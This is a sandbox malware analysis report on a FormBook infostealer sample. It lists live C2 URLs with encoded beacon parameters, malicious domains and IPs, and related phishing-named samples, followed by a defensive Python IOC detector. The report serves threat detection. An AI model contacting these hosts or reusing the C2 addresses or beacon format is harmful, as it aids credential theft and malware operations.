            http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq | 0% | Avira URL Cloud | safe |
            http://www.mqmsqkw.lol/jda9/ | 0% | Avira URL Cloud | safe |
            http://www.zhuan-tou.com/pjmu/?efM=zh3d17Jww7lUdSTn18h3AW52xQeHiultGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GYgJ6QddEnX3CYXXMD+mGHjpcx+XzQAKiSmY=&GTP=uhqpjxIPh | 0% | Avira URL Cloud | safe |
            http://www.lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc= | 0% | Avira URL Cloud | safe |
            http://www.rtrpodcast.online/l2ei/ | 100% | Avira URL Cloud | malware |
            http://www.a9jcpf.top/mpex/?GTP=uhqpjxIPh&efM=Zb/vXsPYNAfjWKU5b+Nt30TyxsxOl11zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3DCw+G1Vpb7KEKzC8l577KkftecMR999sDYI= | 0% | Avira URL Cloud | safe |
            http://www.lfghtko.lol | 0% | Avira URL Cloud | safe |
            http://www.lecoinsa.net/7ffx/ | 0% | Avira URL Cloud | safe |
            http://www.alanbeanart.com/7ie4/?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh | 0% | Avira URL Cloud | safe |
            https://dhosting.pl/bledyhttp/domeny.html | 0% | Avira URL Cloud | safe |
            https://dhosting.pl/img/logo.svg | 0% | Avira URL Cloud | safe |
            http://www.8xbe578.app/1nsp/?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh | 0% | Avira URL Cloud | safe |
            http://www.slushcafe.top/irn0/ | 0% | Avira URL Cloud | safe |
            http://www.kacotae.com/rdfm/?GTP=uhqpjxIPh&efM=wrkGspiQ383g8BvQawprffb7FcgpmXJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvZFoLMOaF6UBG/sMUSe6LmxyUxmV5i7nd1eA= | 0% | Avira URL Cloud | safe |
            http://www.zhuan-tou.com/pjmu/ | 0% | Avira URL Cloud | safe |
            http://www.tqfabxah.com/zjwj/ | 100% | Avira URL Cloud | malware |
            https://dhosting.pl/kontakt | 0% | Avira URL Cloud | safe |
            http://www.a9jcpf.top/mpex/ | 0% | Avira URL Cloud | safe |
            https://dhosting.pl | 0% | Avira URL Cloud | safe |
            https://dhosting.pl/bledyhttp/hosting.html | 0% | Avira URL Cloud | safe |
            http://www.stemfiniti.com/toda/?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw= | 0% | Avira URL Cloud | safe |
            http://www.kacotae.com/rdfm/ | 0% | Avira URL Cloud | safe |
            http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq | 0% | Avira URL Cloud | safe |
            http://www.8xbe578.app/1nsp/ | 0% | Avira URL Cloud | safe |
            http://www.lfghtko.lol/yxos/?efM=GsI4mtIQVr1bqd+V/1qEiGWG2JWSdng8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR32o8KijRXgfnfSTbVFHsQqIz2A3ZpJ0HUFH4=&GTP=uhqpjxIPh | 0% | Avira URL Cloud | safe |
            http://www.synergon.space/8unq/ | 0% | Avira URL Cloud | safe |
            http://www.mqmsqkw.lol/jda9/?GTP=uhqpjxIPh&efM=34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230= | 0% | Avira URL Cloud | safe |
            http://www.tqfabxah.com/zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPh | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
kmdne.ajunsdfancsda.com | 216.83.33.140 | true | false | - | unknown
stemfiniti.com | 3.33.130.190 | true | false | - | unknown
www.lfghtko.lol | 116.213.43.190 | true | false | - | unknown
8xbe578.app | 3.33.130.190 | true | false | - | unknown
alanbeanart.com | 3.33.130.190 | true | false | - | unknown
www.mqmsqkw.lol | 116.213.43.190 | true | false | - | unknown
www.zhuan-tou.com | 38.12.1.29 | true | false | - | unknown
rtrpodcast.online | 76.223.67.189 | true | false | - | unknown
www.tqfabxah.com | 35.241.42.217 | true | false | - | unknown
www.lecoinsa.net | 217.116.0.191 | true | false | - | unknown
synergon.space | 109.95.158.127 | true | false | - | unknown
www.slushcafe.top | 203.161.55.102 | true | false | - | unknown
www.kacotae.com | 64.226.69.42 | true | false | - | unknown
www.alanbeanart.com | unknown | unknown | true | - | unknown
www.stemfiniti.com | unknown | unknown | true | - | unknown
www.a9jcpf.top | unknown | unknown | true | - | unknown
www.winkthree.com | unknown | unknown | true | - | unknown
www.rtrpodcast.online | unknown | unknown | true | - | unknown
www.synergon.space | unknown | unknown | true | - | unknown
www.8xbe578.app | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
--- | --- | --- | ---
http://www.synergon.space/8unq/?GTP=uhqpjxIPh&efM=RkvL3PdT4df/OPkNHI4HmdhQbyPIEJeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6mviVClJubTHF4ksIetQZZ+rgXL6Dldbwq0cw= | false | Avira URL Cloud: safe | unknown
http://www.slushcafe.top/irn0/?efM=rkk12BbGqxBZ8yyVdqr4fumsqySnbS/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdycpy6GTweDeod91OQcupKfuQbLLwzDVUdZDA=&GTP=uhqpjxIPh | false | Avira URL Cloud: safe | unknown
http://www.mqmsqkw.lol/jda9/ | false | Avira URL Cloud: safe | unknown
http://www.zhuan-tou.com/pjmu/?efM=zh3d17Jww7lUdSTn18h3AW52xQeHiultGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GYgJ6QddEnX3CYXXMD+mGHjpcx+XzQAKiSmY=&GTP=uhqpjxIPh | false | Avira URL Cloud: safe | unknown
http://www.alanbeanart.com/7ie4/ | false | Avira URL Cloud: safe | unknown
http://www.lfghtko.lol/yxos/ | false | Avira URL Cloud: safe | unknown
http://www.a9jcpf.top/mpex/?GTP=uhqpjxIPh&efM=Zb/vXsPYNAfjWKU5b+Nt30TyxsxOl11zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3DCw+G1Vpb7KEKzC8l577KkftecMR999sDYI= | false | Avira URL Cloud: safe | unknown
http://www.rtrpodcast.online/l2ei/ | false | Avira URL Cloud: malware | unknown
http://www.lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc= | false | Avira URL Cloud: safe | unknown
http://www.lecoinsa.net/7ffx/ | false | Avira URL Cloud: safe | unknown
http://www.8xbe578.app/1nsp/?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh | false | Avira URL Cloud: safe | unknown
http://www.alanbeanart.com/7ie4/?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh | false | Avira URL Cloud: safe | unknown
http://www.slushcafe.top/irn0/ | false | Avira URL Cloud: safe | unknown
http://www.kacotae.com/rdfm/?GTP=uhqpjxIPh&efM=wrkGspiQ383g8BvQawprffb7FcgpmXJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvZFoLMOaF6UBG/sMUSe6LmxyUxmV5i7nd1eA= | false | Avira URL Cloud: safe | unknown
http://www.zhuan-tou.com/pjmu/ | false | Avira URL Cloud: safe | unknown
http://www.a9jcpf.top/mpex/ | false | Avira URL Cloud: safe | unknown
http://www.tqfabxah.com/zjwj/ | false | Avira URL Cloud: malware | unknown
http://www.stemfiniti.com/toda/?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw= | false | Avira URL Cloud: safe | unknown
http://www.kacotae.com/rdfm/ | false | Avira URL Cloud: safe | unknown
http://www.8xbe578.app/1nsp/ | false | Avira URL Cloud: safe | unknown
http://www.mqmsqkw.lol/jda9/?GTP=uhqpjxIPh&efM=34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230= | false | Avira URL Cloud: safe | unknown
http://www.lfghtko.lol/yxos/?efM=GsI4mtIQVr1bqd+V/1qEiGWG2JWSdng8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR32o8KijRXgfnfSTbVFHsQqIz2A3ZpJ0HUFH4=&GTP=uhqpjxIPh | false | Avira URL Cloud: safe | unknown
http://www.synergon.space/8unq/ | false | Avira URL Cloud: safe | unknown
http://www.tqfabxah.com/zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPh | false | Avira URL Cloud: malware | unknown
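Every C2 URL in the tables above has the same shape: a single four-character path directory and exactly two query parameters, one short fixed token (GTP=uhqpjxIPh in this sample) and one long base64-looking blob, with the parameter order varying between requests. The Avira URL Cloud verdict "safe" on most of these URLs only means the exact URL was unseen; the same hosts carry Malicious=true in the domain table and appear as FormBook C2 in the related-sample context further down, so the reputation column is not a clean bill of health. The Python below is an added example, not part of the Joe Sandbox report: it loads the domains and IPs from the report's tables as an IOC set, encodes the URL shape as a structural check, and runs both over a few constructed proxy-log lines. The log format, the unlisted host www.example-unlisted.test, the placeholder blob, and the assumption that other check-ins use the same shape with a different short token are all assumptions of the example.

```python
import re
from urllib.parse import urlsplit

# Domains and IPs copied from the report's domain/IP tables.
IOC_DOMAINS = {
    "kmdne.ajunsdfancsda.com", "stemfiniti.com", "www.lfghtko.lol", "8xbe578.app",
    "alanbeanart.com", "www.mqmsqkw.lol", "www.zhuan-tou.com", "rtrpodcast.online",
    "www.tqfabxah.com", "www.lecoinsa.net", "synergon.space", "www.slushcafe.top",
    "www.kacotae.com", "www.alanbeanart.com", "www.stemfiniti.com", "www.a9jcpf.top",
    "www.winkthree.com", "www.rtrpodcast.online", "www.synergon.space", "www.8xbe578.app",
}
IOC_IPS = {
    "216.83.33.140", "3.33.130.190", "116.213.43.190", "38.12.1.29", "76.223.67.189",
    "35.241.42.217", "217.116.0.191", "109.95.158.127", "203.161.55.102", "64.226.69.42",
}

# Structural checks derived from the C2 URLs in the report: one four-character path
# directory, two query parameters, one short token and one long base64-like blob.
# Accepting any short token (not only GTP=uhqpjxIPh) is an assumption of this example.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{4,16}$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")


def split_query(query: str) -> list[tuple[str, str]]:
    """Split a query string without decoding: '+' and '/' are part of the blob."""
    pairs = []
    for item in query.split("&"):
        if not item:
            continue
        name, _, value = item.partition("=")
        pairs.append((name, value))
    return pairs


def looks_like_c2_url(url: str) -> bool:
    """True when the URL matches the path/query shape shared by the report's C2 URLs."""
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return False
    values = [v for _, v in split_query(parts.query)]
    if len(values) != 2:
        return False
    return any(TOKEN_RE.match(v) for v in values) and any(BLOB_RE.match(v) for v in values)


def classify(url: str) -> list[str]:
    """Return the reasons a URL is suspicious: listed host, listed IP, or C2 shape."""
    host = (urlsplit(url).hostname or "").lower()
    reasons = []
    if host in IOC_DOMAINS:
        reasons.append("ioc-domain")
    if host in IOC_IPS:
        reasons.append("ioc-ip")
    if looks_like_c2_url(url):
        reasons.append("c2-shape")
    return reasons


# Constructed proxy log: "<time> <client> <method> <url>", one request per line.
FULL_BLOB = ("34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/"
             "iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230=")  # from the report
FAKE_BLOB = "A" * 100 + "=="  # constructed placeholder using only the base64 alphabet
SAMPLE_LOG = f"""\
2024-08-05T13:31:41Z 10.0.0.23 GET http://www.mqmsqkw.lol/jda9/?GTP=uhqpjxIPh&efM={FULL_BLOB}
2024-08-05T13:31:42Z 10.0.0.23 GET http://www.example-unlisted.test/ab1c/?efM={FAKE_BLOB}&GTP=uhqpjxIPh
2024-08-05T13:31:43Z 10.0.0.23 GET http://38.12.1.29/pjmu/
2024-08-05T13:31:44Z 10.0.0.23 GET https://duckduckgo.com/chrome_newtab
"""


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (url, reasons) for every request that hits an IOC or the C2 shape."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        url = fields[-1]
        reasons = classify(url)
        if reasons:
            hits.append((url, reasons))
    return hits


if __name__ == "__main__":
    for url, reasons in scan_log(SAMPLE_LOG):
        print(",".join(reasons), url)
```

The structural check is deliberately separate from the IOC lookup: the second constructed log line hits on shape alone, which is the case a list-based block would miss once the operator rotates domains, while the truncated string found in process memory (`...efM=bNQ0/ONSUiz8CveulmeeGbtq`) is too short for the blob check and is not flagged by it.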
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://duckduckgo.com/chrome_newtab | schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq | schtasks.exe, 00000004.00000002.4112702566.00000000043B8000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.0000000002DB8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://track.uc.cn/collect | schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dhosting.pl/bledyhttp/domeny.html | schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.lfghtko.lol | MHFAGZiftf.exe, 00000007.00000002.4113899205.0000000004B78000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js | schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dhosting.pl/img/logo.svg | schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dhosting.pl/kontakt | MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hm.baidu.com/hm.js? | schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dhosting.pl | MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dhosting.pl/bledyhttp/hosting.html | schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq | MHFAGZiftf.exe, 00000007.00000002.4112168789.0000000002DB8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
[Map legend, figure not reproduced: share of contacted IPs per region, binned as < 25%, 25% to 50%, 50% to 75%, and > 75%]
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
35.241.42.217 | www.tqfabxah.com | United States | 15169 | GOOGLE, US | false
217.116.0.191 | www.lecoinsa.net | Spain | 16371 | ACENS_AS Spain Hosting housing and VPN services, ES | false
76.223.67.189 | rtrpodcast.online | United States | 16509 | AMAZON-02, US | false
203.161.55.102 | www.slushcafe.top | Malaysia | 45899 | VNPT-AS-VN VNPT Corp, VN | false
38.12.1.29 | www.zhuan-tou.com | United States | 174 | COGENT-174, US | false
64.226.69.42 | www.kacotae.com | Canada | 13768 | COGECO-PEER1, CA | false
109.95.158.127 | synergon.space | Poland | 48896 | DHOSTING-AS Warsaw Poland, PL | false
3.33.130.190 | stemfiniti.com | United States | 8987 | AMAZON EXPANSION, GB | false
216.83.33.140 | kmdne.ajunsdfancsda.com | United States | 64050 | BCPL-SG BGPNET Global ASN, SG | false
116.213.43.190 | www.lfghtko.lol | Hong Kong | 63889 | CLOUDIVLIMITED-AS CloudIv Limited, HK | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1488022
Start date and time: 2024-08-05 15:29:44 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Scanned Docs from Emnes Metal Sdn Bhd_.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@16/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 50
• Number of non-executed functions: 291
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target MHFAGZiftf.exe, PID 2872 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• VT rate limit hit for: Scanned Docs from Emnes Metal Sdn Bhd_.exe
Time | Type | Description
--- | --- | ---
09:31:39 | API Interceptor | 10700167x Sleep call for process schtasks.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
217.116.0.191 | HSBCscancopy-invoice778483-payment87476MT103.exe | malicious | FormBook | www.lecoinsa.net/i4bw/
217.116.0.191 | Request for Quotation - (SM Store San Mateo).exe | malicious | FormBook | www.lecoinsa.net/zd4t/
217.116.0.191 | D02984-KP-002011.exe | malicious | FormBook | www.lecoinsa.net/7ffx/
217.116.0.191 | REQN#1010135038.exe | malicious | FormBook | www.lecoinsa.net/7ffx/
217.116.0.191 | pismo1A 12.06.2024.exe | malicious | FormBook | www.lecoinsa.net/xu8t/
217.116.0.191 | RFQ for Maintenance usering for Sabratha Project.exe | malicious | FormBook | www.lecoinsa.net/zd4t/
217.116.0.191 | CFV20240600121.exe | malicious | FormBook | www.lecoinsa.net/xu8t/
217.116.0.191 | Nbvkrvfanxfmla.exe | malicious | DBatLoader, FormBook | www.captoriot.com/pn4e/?KfTD=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&pd=8k02Xq71ReL2NgiL
217.116.0.191 | fJXbhkbAh4.exe | malicious | FormBook, GuLoader | www.metabolomicsrubio.com/he4z/?iY0=3flPJv6ieGjXtu2BZjlDCLsRYPXaTlSmnAGDaGGFSllhsjO/k4Cp7cSc5yNsqXbWoVnAdcraHliC8m1hOte1JfoJWxEBFbScRA==&m5h_Y=eBnFNQLxHa46YDho
217.116.0.191 | Image_0000384757.vbs | malicious | FormBook | www.metabolomicsrubio.com/nbys/?bj=s1S3SPgRNf7lMN0xl2vbADF7xYqfipWGAgii2Z+ocbhr7l7z1f11h4s+9phUKVtapv+G0obo8tHeZk2i1iFboqWmw/7EeLn68w==&kfh=KmQsQQxqanX
76.223.67.189 | SecuriteInfo.com.Win32.RATX-gen.24742.674.exe | malicious | FormBook, PureLog Stealer | www.stellardaysigning.com/xb5p/
76.223.67.189 | mtTw7o41OC.exe | malicious | FormBook, PureLog Stealer | www.microsofr.fun/omnp/
76.223.67.189 | Payrol list.exe | malicious | FormBook | www.rtrpodcast.online/g3rq/
76.223.67.189 | LisectAVT_2403002B_448.exe | malicious | FormBook, PureLog Stealer | www.magnauniversity.com/hfhf/?6lBX5p6=A/Xwur6vfkk1nt0HF5vI+iD3HQmsBnVKlXfi47Zpsj5D+hS3O7IepQPDfrVs1xyfsUFv&Kjsl=FbuD_t_HwtJdin
76.223.67.189 | IIMG_00172424.exe | malicious | FormBook | www.stellardaysigning.com/xb5p/
76.223.67.189 | eqqjbbjMlt.elf | malicious | Unknown | mgsdaigou2.com/
76.223.67.189 | gUJak0onLk.elf | malicious | Unknown | kensingtonconfectionery.com/
76.223.67.189 | bJrO2iUerN.elf | malicious | Unknown | tmjsleepmilwakuee.com/
76.223.67.189 | SecuriteInfo.com.Trojan.PackedNET.2966.14355.23143.exe | malicious | FormBook | www.stellardaysigning.com/xb5p/
76.223.67.189 | Documente de expediere.exe | malicious | FormBook | www.funnelkakes.com/sgjw/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
www.mqmsqkw.lol | Payrol list.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | New Order.exe | malicious | FormBook, PureLog Stealer | 116.213.43.190
www.mqmsqkw.lol | BL.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | payment advice.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | MV SHUHA QUEEN II.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | AuT5pFGTFw.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | new order.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | nJ8mJTmMf0.exe | malicious | FormBook | 116.213.43.190
www.mqmsqkw.lol | DHL Arrival Notice.exe | malicious | FormBook | 116.213.43.190
www.lfghtko.lol | PTT request form.exe | malicious | FormBook | 116.213.43.190
www.lfghtko.lol | PTT requested quotation.exe | malicious | FormBook | 116.213.43.190
www.lfghtko.lol | D02984-KP-002011.exe | malicious | FormBook | 116.213.43.190
www.lfghtko.lol | REQN#1010135038.exe | malicious | FormBook | 116.213.43.190
www.lfghtko.lol | PTT quotation form.exe | malicious | FormBook | 116.213.43.190
www.lfghtko.lol | Required quotations data list.exe | malicious | FormBook | 116.213.43.190
www.lfghtko.lol | SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.20907.8920.exe | malicious | FormBook | 116.213.43.190
www.lfghtko.lol | HILCORP ENERGY REQUESTS.zip | malicious | FormBook | 116.213.43.190
Match | Associated Sample Name / URL | Detection | Threat Name | Context
